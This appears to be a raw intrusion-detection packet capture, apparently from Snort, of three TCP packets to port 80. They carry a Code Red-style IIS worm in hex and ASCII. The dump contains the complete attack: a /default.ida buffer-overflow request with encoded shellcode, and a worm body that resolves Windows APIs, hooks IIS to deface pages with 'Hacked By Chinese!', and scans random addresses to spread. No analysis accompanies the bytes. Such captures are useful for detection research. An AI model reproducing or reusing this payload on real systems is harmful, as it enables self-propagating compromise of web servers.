03/12-01:27:06.690520 143.132.233.222:3494 -> 192.168.1.101:80 TCP TTL:240 TOS:0x10 ID:0 IpLen:20 DgmLen:1496 ***AP*** Seq: 0x3C308CA9 Ack: 0x763CFB60 Win: 0x2208 TcpLen: 20 47 45 54 20 2F 64 65 66 61 75 6C 74 2E 69 64 61 GET /default.ida 3F 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E ?NNNNNNNNNNNNNNN 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN 4E 25 75 39 30 39 30 25 75 36 38 35 38 25 75 63 N%u9090%u6858%uc 62 64 33 25 75 37 38 30 31 25 75 39 30 39 30 25 bd3%u7801%u9090% 75 36 38 35 38 25 75 63 62 64 33 25 75 37 38 30 u6858%ucbd3%u780 31 25 75 39 30 39 30 25 75 36 38 35 38 25 75 63 1%u9090%u6858%uc 62 64 33 25 75 37 38 30 31 25 75 39 30 39 30 25 bd3%u7801%u9090% 75 39 30 39 30 25 75 38 31 39 30 25 75 30 30 63 u9090%u8190%u00c 33 25 75 30 30 30 33 25 75 38 62 30 30 25 75 35 3%u0003%u8b00%u5 33 31 62 25 75 35 33 66 66 25 75 30 30 37 38 25 31b%u53ff%u0078% 75 30 30 30 30 25 75 30 30 3D 61 20 20 48 54 54 u0000%u00=a HTT 50 2F 31 2E 30 0D 0A 43 6F 6E 74 65 6E 74 2D 74 P/1.0..Content-t 79 70 65 3A 20 74 65 78 74 2F 78 6D 6C 0A 48 4F ype: text/xml.HO 53 54 3A 77 77 77 2E 77 6F 72 6D 2E 63 6F 6D 0A ST:www.worm.com. 20 41 63 63 65 70 74 3A 20 2A 2F 2A 0A 43 6F 6E Accept: */*.Con 74 65 6E 74 2D 6C 65 6E 67 74 68 3A 20 33 35 36 tent-length: 356 39 20 0D 0A 0D 0A 55 8B EC 81 EC 18 02 00 00 53 9 ....U........S 56 57 8D BD E8 FD FF FF B9 86 00 00 00 B8 CC CC VW.............. CC CC F3 AB C7 85 70 FE FF FF 00 00 00 00 E9 0A ......p......... 0B 00 00 8F 85 68 FE FF FF 8D BD F0 FE FF FF 64 .....h.........d A1 00 00 00 00 89 47 08 64 89 3D 00 00 00 00 E9 ......G.d.=..... 6F 0A 00 00 8F 85 60 FE FF FF C7 85 F0 FE FF FF o.....`......... FF FF FF FF 8B 85 68 FE FF FF 83 E8 07 89 85 F4 ......h......... FE FF FF C7 85 58 FE FF FF 00 00 E0 77 E8 9B 0A .....X......w... 00 00 83 BD 70 FE FF FF 00 0F 85 DD 01 00 00 8B ....p........... 8D 58 FE FF FF 81 C1 00 00 01 00 89 8D 58 FE FF .X...........X.. FF 81 BD 58 FE FF FF 00 00 00 78 75 0A C7 85 58 ...X......xu...X FE FF FF 00 00 F0 BF 8B 95 58 FE FF FF 33 C0 66 .........X...3.f 8B 02 3D 4D 5A 00 00 0F 85 9A 01 00 00 8B 8D 58 ..=MZ..........X FE FF FF 8B 51 3C 8B 85 58 FE FF FF 33 C9 66 8B ....Q<..X...3.f. 0C 10 81 F9 50 45 00 00 0F 85 79 01 00 00 8B 95 ....PE....y..... 58 FE FF FF 8B 42 3C 8B 8D 58 FE FF FF 8B 54 01 X....B<..X....T. 78 03 95 58 FE FF FF 89 95 54 FE FF FF 8B 85 54 x..X.....T.....T FE FF FF 8B 48 0C 03 8D 58 FE FF FF 89 8D 4C FE ....H...X.....L. FF FF 8B 95 4C FE FF FF 81 3A 4B 45 52 4E 0F 85 ....L....:KERN.. 33 01 00 00 8B 85 4C FE FF FF 81 78 04 45 4C 33 3.....L....x.EL3 32 0F 85 20 01 00 00 8B 8D 58 FE FF FF 89 8D 34 2.. .....X.....4 FE FF FF 8B 95 54 FE FF FF 8B 85 58 FE FF FF 03 .....T.....X.... 42 20 89 85 4C FE FF FF C7 85 48 FE FF FF 00 00 B ..L.....H..... 00 00 EB 1E 8B 8D 48 FE FF FF 83 C1 01 89 8D 48 ......H........H FE FF FF 8B 95 4C FE FF FF 83 C2 04 89 95 4C FE .....L........L. FF FF 8B 85 54 FE FF FF 8B 8D 48 FE FF FF 3B 48 ....T.....H...;H 18 0F 8D C0 00 00 00 8B 95 4C FE FF FF 8B 02 8B .........L...... 8D 58 FE FF FF 81 3C 01 47 65 74 50 0F 85 A0 00 .X....<.GetP.... 00 00 8B 95 4C FE FF FF 8B 02 8B 8D 58 FE FF FF ....L.......X... 81 7C 01 04 72 6F 63 41 0F 85 84 00 00 00 8B 95 .|..rocA........ 48 FE FF FF 03 95 48 FE FF FF 03 95 58 FE FF FF H.....H.....X... 8B 85 54 FE FF FF 8B 48 24 33 C0 66 8B 04 0A 89 ..T....H$3.f.... 85 4C FE FF FF 8B 8D 54 FE FF FF 8B 51 10 8B 85 .L.....T....Q... 4C FE FF FF 8D 4C 10 FF 89 8D 4C FE FF FF 8B 95 L....L....L..... 4C FE FF FF 03 95 4C FE FF FF 03 95 4C FE FF FF L.....L.....L... 03 95 4C FE FF FF 03 95 58 FE FF FF 8B 85 54 FE ..L.....X.....T. FF FF 8B 48 1C 8B 14 0A 89 95 4C FE FF FF 8B 85 ...H......L..... 4C FE FF FF 03 85 58 FE FF FF 89 85 70 FE FF FF L.....X.....p... EB 05 E9 0D FF FF FF E9 16 FE FF FF 8D BD F0 FE ................ FF FF 8B 47 08 64 A3 00 00 00 00 83 BD 70 FE FF ...G.d.......p.. FF 00 75 05 E9 38 08 00 00 C7 85 4C FE FF FF 01 ..u..8.....L.... 00 00 00 EB 0F 8B 8D 4C FE FF FF 83 C1 01 89 8D .......L........ 4C FE FF FF 8B 95 68 FE FF FF 0F BE 02 85 C0 0F L.....h......... 84 8D 00 00 00 8B 8D 68 FE FF FF 0F BE 11 83 FA .......h........ 09 75 21 8B 85 68 FE FF FF 83 C0 01 8B F4 50 FF .u!..h........P. 95 90 FE FF FF 3B F4 90 43 4B 43 4B 89 85 34 FE .....;..CKCK..4. FF FF EB 2A 8B F4 8B 8D 68 FE FF FF 51 8B 95 34 ...*....h...Q..4 FE FF FF 52 FF 95 70 FE FF FF 3B F4 90 43 4B 43 ...R..p...;..CKC 4B 8B 8D 4C FE FF FF 89 84 8D 8C FE FF FF EB 0F K..L............ 8B 95 68 FE FF FF 83 C2 01 89 95 68 FE FF FF 8B ..h........h.... 85 68 FE FF FF 0F BE 08 85 C9 74 02 EB E2 8B 95 .h........t..... 68 FE FF FF 83 C2 01 89 95 68 FE FF FF E9 53 FF h........h....S. FF FF 8B 85 68 FE FF FF 83 C0 01 89 85 68 FE FF ....h........h.. FF 8B 4D 08 8B 91 84 00 00 00 89 95 6C FE FF FF ..M.........l... C7 85 4C FE FF FF 04 00 00 00 C6 85 D0 FE FF FF ..L............. 68 8B 45 08 89 85 D1 FE FF FF C7 85 D5 FE FF FF h.E............. 5B 53 53 FF C7 85 D9 FE FF FF 63 78 90 90 8B 4D [SS.......cx...M 08 8B 51 10 89 95 50 FE FF FF 83 BD 50 FE FF FF ..Q...P.....P... 00 75 26 8B F4 6A 00 8D 85 4C FE FF FF 50 8B 8D .u&..j...L...P.. 68 FE FF FF 51 8B 55 08 8B 42 08 50 FF 95 6C FE h...Q.U..B.P..l. FF FF 3B F4 90 43 4B 43 4B 83 BD 50 FE FF FF 64 ..;..CKCK..P...d 7D 5C 8B 8D 50 FE FF FF 83 C1 01 89 8D 50 FE FF }\..P........P.. 03/12-01:27:06.759000 143.132.233.222:3494 -> 192.168.1.101:80 TCP TTL:107 TOS:0x0 ID:21294 IpLen:20 DgmLen:1492 DF ***A**** Seq: 0x763CFB60 Ack: 0x3C308CA9 Win: 0x4410 TcpLen: 20 FF 8B 95 50 FE FF FF 69 D2 8D 66 F0 50 89 95 74 ...P...i..f.P..t FE FF FF 8B 45 08 8B 8D 50 FE FF FF 89 48 10 8B ....E...P....H.. F4 8D 95 2C FE FF FF 52 6A 00 8D 85 4C FE FF FF ...,...Rj...L... 50 8D 8D D0 FE FF FF 51 6A 00 6A 00 FF 95 98 FE P......Qj.j..... FF FF 3B F4 90 43 4B 43 4B E9 9F 01 00 00 8B F4 ..;..CKCK....... FF 95 A4 FE FF FF 3B F4 90 43 4B 43 4B 89 85 4C ......;..CKCK..L FE FF FF 8B 95 4C FE FF FF 81 E2 FF FF 00 00 89 .....L.......... 95 4C FE FF FF 81 BD 4C FE FF FF 09 04 00 00 74 .L.....L.......t 05 E9 67 01 00 00 8B F4 68 00 DD 6D 00 FF 95 A0 ..g.....h..m.... FE FF FF 3B F4 90 43 4B 43 4B E9 80 06 00 00 8F ...;..CKCK...... 85 4C FE FF FF 8B 85 34 FE FF FF 89 85 CC FE FF .L.....4........ FF 8B 8D 4C FE FF FF 8B 95 B0 FE FF FF 89 11 8B ...L............ 85 4C FE FF FF 8B 8D C8 FE FF FF 89 48 04 8B 95 .L..........H... 68 FE FF FF 89 95 50 FE FF FF EB 0F 8B 85 50 FE h.....P.......P. FF FF 83 C0 01 89 85 50 FE FF FF 8B 8D 68 FE FF .......P.....h.. FF 81 C1 00 01 00 00 39 8D 50 FE FF FF 73 12 8B .......9.P...s.. 95 50 FE FF FF 81 3A 4C 4D 54 48 75 02 EB 02 EB .P....:LMTHu.... CB 8B 85 50 FE FF FF 83 C0 04 8B 8D 4C FE FF FF ...P........L... 89 41 08 8B F4 8D 95 48 FE FF FF 52 6A 04 68 00 .A.....H...Rj.h. 40 00 00 8B 85 CC FE FF FF 50 FF 95 A8 FE FF FF @........P...... 3B F4 90 43 4B 43 4B C7 85 4C FE FF FF 00 00 00 ;..CKCK..L...... 00 EB 0F 8B 8D 4C FE FF FF 83 C1 01 89 8D 4C FE .....L........L. FF FF 81 BD 4C FE FF FF 00 30 00 00 7D 56 8B 95 ....L....0..}V.. CC FE FF FF 03 95 4C FE FF FF 8B 02 3B 85 B0 FE ......L.....;... FF FF 75 3E 8B 8D CC FE FF FF 03 8D 4C FE FF FF ..u>........L... 8B 95 60 FE FF FF 89 11 8B F4 68 00 51 25 02 FF ..`.......h.Q%.. 95 A0 FE FF FF 3B F4 90 43 4B 43 4B 8B 85 CC FE .....;..CKCK.... FF FF 03 85 4C FE FF FF 8B 8D B0 FE FF FF 89 08 ....L........... EB 02 EB 8F 8B F4 8D 95 4C FE FF FF 52 8B 85 48 ........L...R..H FE FF FF 50 68 00 40 00 00 8B 8D CC FE FF FF 51 ...Ph.@........Q FF 95 A8 FE FF FF 3B F4 90 43 4B 43 4B BA 01 00 ......;..CKCK... 00 00 85 D2 0F 84 E7 04 00 00 8B F4 6A 00 68 80 ............j.h. 00 00 00 6A 03 6A 00 6A 01 68 00 00 00 80 8B 85 ...j.j.j.h...... 68 FE FF FF 83 C0 63 50 FF 95 9C FE FF FF 3B F4 h.....cP......;. 90 43 4B 43 4B 89 85 30 FE FF FF 83 BD 30 FE FF .CKCK..0.....0.. FF FF 74 1F B9 01 00 00 00 85 C9 74 16 8B F4 68 ..t........t...h FF FF FF 7F FF 95 A0 FE FF FF 3B F4 90 43 4B 43 ..........;..CKC 4B EB E1 8B F4 8D 95 38 FE FF FF 52 FF 95 94 FE K......8...R.... FF FF 3B F4 90 43 4B 43 4B 8B 85 3E FE FF FF 89 ..;..CKCK..>.... 85 4C FE FF FF 8B 8D 4C FE FF FF 81 E1 FF FF 00 .L.....L........ 00 89 8D 4C FE FF FF 83 BD 4C FE FF FF 14 0F 8C ...L.....L...... 47 01 00 00 BA 01 00 00 00 85 D2 0F 84 3A 01 00 G............:.. 00 8B F4 8D 85 38 FE FF FF 50 FF 95 94 FE FF FF .....8...P...... 3B F4 90 43 4B 43 4B 8B 8D 3E FE FF FF 89 8D 4C ;..CKCK..>.....L FE FF FF 8B 95 4C FE FF FF 81 E2 FF FF 00 00 89 .....L.......... 95 4C FE FF FF 83 BD 4C FE FF FF 1C 7C 1F B8 01 .L.....L....|... 00 00 00 85 C0 74 16 8B F4 68 FF FF FF 7F FF 95 .....t...h...... A0 FE FF FF 3B F4 90 43 4B 43 4B EB E1 8B F4 6A ....;..CKCK....j 64 FF 95 A0 FE FF FF 3B F4 90 43 4B 43 4B 8B F4 d......;..CKCK.. 6A 00 6A 01 6A 02 FF 95 B8 FE FF FF 3B F4 90 43 j.j.j.......;..C 4B 43 4B 89 85 78 FE FF FF 66 C7 85 7C FE FF FF KCK..x...f..|... 02 00 66 C7 85 7E FE FF FF 00 50 C7 85 80 FE FF ..f..~....P..... FF C6 89 F0 5B 8B F4 6A 10 8D 8D 7C FE FF FF 51 ....[..j...|...Q 8B 95 78 FE FF FF 52 FF 95 BC FE FF FF 3B F4 90 ..x...R......;.. 43 4B 43 4B C7 85 4C FE FF FF 00 00 00 00 EB 0F CKCK..L......... 8B 85 4C FE FF FF 83 C0 01 89 85 4C FE FF FF 81 ..L........L.... BD 4C FE FF FF 00 80 01 00 7D 37 8B F4 68 E8 03 .L.......}7..h.. 00 00 FF 95 A0 FE FF FF 3B F4 90 43 4B 43 4B 8B ........;..CKCK. F4 6A 00 6A 01 8D 8D FC FE FF FF 51 8B 95 78 FE .j.j.......Q..x. FF FF 52 FF 95 C0 FE FF FF 3B F4 90 43 4B 43 4B ..R......;..CKCK EB AE 8B F4 68 00 00 00 01 FF 95 A0 FE FF FF 3B ....h..........; F4 90 43 4B 43 4B E9 B9 FE FF FF 8B 85 44 FE FF ..CKCK.......D.. FF 89 85 50 FE FF FF 8B 8D 50 FE FF FF 0F AF 8D ...P.....P...... 50 FE FF FF 69 C9 E3 59 CD 00 8B 95 50 FE FF FF P...i..Y....P... 69 D2 B9 E1 01 00 8B 85 74 FE FF FF 03 C1 03 D0 i.......t....... 89 95 74 FE FF FF 8B 8D 74 FE FF FF 69 C9 83 33 ..t.....t...i..3 CF 00 81 C1 53 FE 6B 07 89 8D 74 FE FF FF 8B 95 ....S.k...t..... 74 FE FF FF 81 E2 FF 00 00 00 89 95 50 FE FF FF t...........P... 83 BD 50 FE FF FF 7F 74 0C 81 BD 50 FE FF FF E0 ..P....t...P.... 00 00 00 75 11 8B 85 74 FE FF FF 05 A9 0D 02 00 ...u...t........ 89 85 74 FE FF FF 8B F4 6A 64 FF 95 A0 FE FF FF ..t.....jd...... 3B F4 90 43 4B 43 4B 8B F4 6A 00 6A 01 6A 02 FF ;..CKCK..j.j.j.. 95 B8 FE FF FF 3B F4 90 43 4B 43 4B 89 85 78 FE .....;..CKCK..x. FF FF 66 C7 85 7C FE FF FF 02 00 66 C7 85 7E FE ..f..|.....f..~. FF FF 00 50 8B 8D 74 FE FF FF 89 8D 80 FE FF FF ...P..t......... 8B F4 6A 10 8D 95 7C FE FF FF 52 8B 85 78 FE FF ..j...|...R..x.. FF 50 FF 95 BC FE FF FF 3B F4 90 43 4B 43 4B 85 .P......;..CKCK. C0 0F 85 EF 01 00 00 8B F4 6A 00 6A 04 8B 8D 68 .........j.j...h FE FF FF 51 8B 95 78 FE FF FF 52 FF 95 C0 FE FF ...Q..x...R..... FF 3B F4 90 43 4B 43 4B C7 85 4C FE FF FF 00 00 .;..CKCK..L..... 00 00 8B 45 08 8B 48 68 89 8D 64 FE FF FF EB 1E ...E..Hh..d..... 8B 95 64 FE FF FF 83 C2 01 89 95 64 FE FF FF 8B ..d........d.... 85 4C FE FF FF 83 C0 01 89 85 4C FE FF FF 8B 8D .L........L..... 64 FE FF FF 0F BE 11 85 D2 74 02 EB D3 8B F4 6A d........t.....j 00 8B 85 4C FE FF FF 50 8B 4D 08 8B 51 68 52 8B ...L...P.M..QhR. 85 78 FE FF FF 50 FF 95 C0 FE FF FF 3B F4 90 43 .x...P......;..C 4B 43 4B 8B F4 6A 00 6A 01 8B 8D 68 FE FF FF 83 KCK..j.j...h.... C1 05 51 8B 95 78 FE FF FF 52 FF 95 C0 FE FF FF ..Q..x...R...... 3B F4 90 43 4B 43 4B C7 85 4C FE FF FF 00 00 00 ;..CKCK..L...... 00 8B 45 08 8B 48 64 89 8D 64 FE FF FF EB 1E 8B ..E..Hd..d...... 95 64 FE FF FF 83 C2 01 89 95 64 FE .d........d. 03/12-01:27:06.765469 143.132.233.222:3494 -> 192.168.1.101:80 TCP TTL:107 TOS:0x0 ID:21295 IpLen:20 DgmLen:1171 DF ***AP*** Seq: 0x763D010C Ack: 0x3C308CA9 Win: 0x4410 TcpLen: 20 FF FF 8B 85 4C FE FF FF 83 C0 01 89 85 4C FE FF ....L........L.. FF 8B 8D 64 FE FF FF 0F BE 11 85 D2 74 02 EB D3 ...d........t... 8B F4 6A 00 8B 85 4C FE FF FF 50 8B 4D 08 8B 51 ..j...L...P.M..Q 64 52 8B 85 78 FE FF FF 50 FF 95 C0 FE FF FF 3B dR..x...P......; F4 90 43 4B 43 4B C7 85 4C FE FF FF 00 00 00 00 ..CKCK..L....... 8B 8D 68 FE FF FF 83 C1 07 89 8D 64 FE FF FF EB ..h........d.... 1E 8B 95 64 FE FF FF 83 C2 01 89 95 64 FE FF FF ...d........d... 8B 85 4C FE FF FF 83 C0 01 89 85 4C FE FF FF 8B ..L........L.... 8D 64 FE FF FF 0F BE 11 85 D2 74 02 EB D3 8B F4 .d........t..... 6A 00 8B 85 4C FE FF FF 50 8B 8D 68 FE FF FF 83 j...L...P..h.... C1 07 51 8B 95 78 FE FF FF 52 FF 95 C0 FE FF FF ..Q..x...R...... 3B F4 90 43 4B 43 4B 8B 45 08 8B 48 70 89 8D 4C ;..CKCK.E..Hp..L FE FF FF 8B F4 6A 00 8B 95 4C FE FF FF 52 8B 45 .....j...L...R.E 08 8B 48 78 51 8B 95 78 FE FF FF 52 FF 95 C0 FE ..HxQ..x...R.... FF FF 3B F4 90 43 4B 43 4B C6 85 FC FE FF FF 00 ..;..CKCK....... 8B F4 6A 00 68 00 01 00 00 8D 85 FC FE FF FF 50 ..j.h..........P 8B 8D 78 FE FF FF 51 FF 95 C4 FE FF FF 3B F4 90 ..x...Q......;.. 43 4B 43 4B 89 85 4C FE FF FF 8B F4 8B 95 78 FE CKCK..L.......x. FF FF 52 FF 95 C8 FE FF FF 3B F4 90 43 4B 43 4B ..R......;..CKCK E9 0C FB FF FF EB FE E8 8C F5 FF FF EB 30 58 83 .............0X. C0 05 55 57 53 56 50 6A 3C 8B F0 83 C6 0C 56 68 ..UWSVPj<.....Vh 00 01 00 00 FF 70 08 FF 74 24 28 FF 10 58 50 FF .....p..t$(..XP. 74 24 18 FF 50 04 58 5E 5B 5F 5D FF 20 90 E8 CB t$..P.X^[_]. ... FF FF FF E8 7B F9 FF FF 2C 37 28 6E 84 32 03 75 ....{...,7(n.2.u 83 4F 42 00 00 01 00 00 78 56 34 12 B8 78 56 34 .OB.....xV4..xV4 12 58 50 8B BD 68 FE FF FF 89 47 F2 C3 8B 44 24 .XP..h....G...D$ 0C 05 B8 00 00 00 C7 00 9A 43 42 00 33 C0 C3 EB .........CB.3... EC E8 F1 F4 FF FF 4C 6F 61 64 4C 69 62 72 61 72 ......LoadLibrar 79 41 00 47 65 74 53 79 73 74 65 6D 54 69 6D 65 yA.GetSystemTime 00 43 72 65 61 74 65 54 68 72 65 61 64 00 43 72 .CreateThread.Cr 65 61 74 65 46 69 6C 65 41 00 53 6C 65 65 70 00 eateFileA.Sleep. 47 65 74 53 79 73 74 65 6D 44 65 66 61 75 6C 74 GetSystemDefault 4C 61 6E 67 49 44 00 56 69 72 74 75 61 6C 50 72 LangID.VirtualPr 6F 74 65 63 74 00 09 69 6E 66 6F 63 6F 6D 6D 2E otect..infocomm. 64 6C 6C 00 54 63 70 53 6F 63 6B 53 65 6E 64 00 dll.TcpSockSend. 09 57 53 32 5F 33 32 2E 64 6C 6C 00 73 6F 63 6B .WS2_32.dll.sock 65 74 00 63 6F 6E 6E 65 63 74 00 73 65 6E 64 00 et.connect.send. 72 65 63 76 00 63 6C 6F 73 65 73 6F 63 6B 65 74 recv.closesocket 00 09 77 33 73 76 63 2E 64 6C 6C 00 00 47 45 54 ..w3svc.dll..GET 20 00 3F 00 20 20 48 54 54 50 2F 31 2E 30 0D 0A .?. HTTP/1.0.. 43 6F 6E 74 65 6E 74 2D 74 79 70 65 3A 20 74 65 Content-type: te 78 74 2F 78 6D 6C 0A 48 4F 53 54 3A 77 77 77 2E xt/xml.HOST:www. 77 6F 72 6D 2E 63 6F 6D 0A 20 41 63 63 65 70 74 worm.com. Accept 3A 20 2A 2F 2A 0A 43 6F 6E 74 65 6E 74 2D 6C 65 : */*.Content-le 6E 67 74 68 3A 20 33 35 36 39 20 0D 0A 0D 0A 00 ngth: 3569 ..... 63 3A 5C 6E 6F 74 77 6F 72 6D 00 4C 4D 54 48 0D c:\notworm.LMTH. 0A 3C 68 74 6D 6C 3E 3C 68 65 61 64 3E 3C 6D 65 .HELLO!< 2F 74 69 74 6C 65 3E 3C 2F 68 65 61 64 3E 3C 62 /title></head><b 61 64 79 3E 3C 68 72 20 73 69 7A 65 3D 35 3E 3C ady><hr size=5>< 66 6F 6E 74 20 63 6F 6C 6F 72 3D 22 72 65 64 22 font color="red" 3E 3C 70 20 61 6C 69 67 6E 3D 22 63 65 6E 74 65 ><p align="cente 72 22 3E 57 65 6C 63 6F 6D 65 20 74 6F 20 68 74 r">Welcome to ht 74 70 3A 2F 2F 77 77 77 2E 77 6F 72 6D 2E 63 6F tp://www.worm.co 6D 20 21 3C 62 72 3E 3C 62 72 3E 48 61 63 6B 65 m !<br><br>Hacke 64 20 42 79 20 43 68 69 6E 65 73 65 21 3C 2F 66 d By Chinese!</f 6F 6E 74 3E 3C 2F 68 72 3E 3C 2F 62 61 64 79 3E ont></hr></bady> 3C 2F 68 74 6D 6C 3E 20 20 20 20 20 20 20 20 20 </html> 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20